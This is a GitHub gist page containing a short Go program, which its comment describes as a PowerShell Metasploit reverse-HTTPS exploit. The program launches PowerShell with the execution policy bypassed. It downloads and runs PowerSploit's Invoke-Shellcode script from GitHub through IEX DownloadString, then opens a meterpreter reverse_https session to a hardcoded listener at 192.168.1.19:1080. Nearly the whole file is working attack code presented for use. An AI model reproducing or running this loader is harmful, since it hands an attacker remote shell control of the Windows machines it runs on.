Last active
June 30, 2017 12:19
-
-
Save mauri870/664792c3f910eb26d498b5eda9a52b40 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Powershell exploit reverse https metasploit | |
| // It will connect with a meterpreter session running on LHOST:LPORT granting superpowers ;) | |
| package main | |
| import ( | |
| "fmt" | |
| "os/exec" | |
| ) | |
| const ( | |
| LHOST = "192.168.1.19" | |
| LPORT = 1080 | |
| ) | |
| var ( | |
| url = "https://raw.githubusercontent.com/enigma0x3/PowerSploit/446d621c8c2e9fa9e92168aa46c3de8266ffac30/CodeExecution/Invoke--Shellcode.ps1" | |
| cmd = fmt.Sprintf(`IEX (New-Object Net.WebClient).DownloadString('%s')`, url) | |
| exploit = fmt.Sprintf("Invoke-Shellcode -Payload windows/meterpreter/reverse_https -lhost %s -lport %d -Force -Verbose", LHOST, LPORT) | |
| ) | |
| func main() { | |
| binary, err := exec.LookPath("powershell") | |
| if err != nil { | |
| panic(err) | |
| } | |
| cmd := exec.Command(binary, fmt.Sprintf(`PowerShell -ExecutionPolicy Bypass -NoLogo -NoExit -Command "%s;%s"`, cmd, exploit)) | |
| cmd.Start() | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment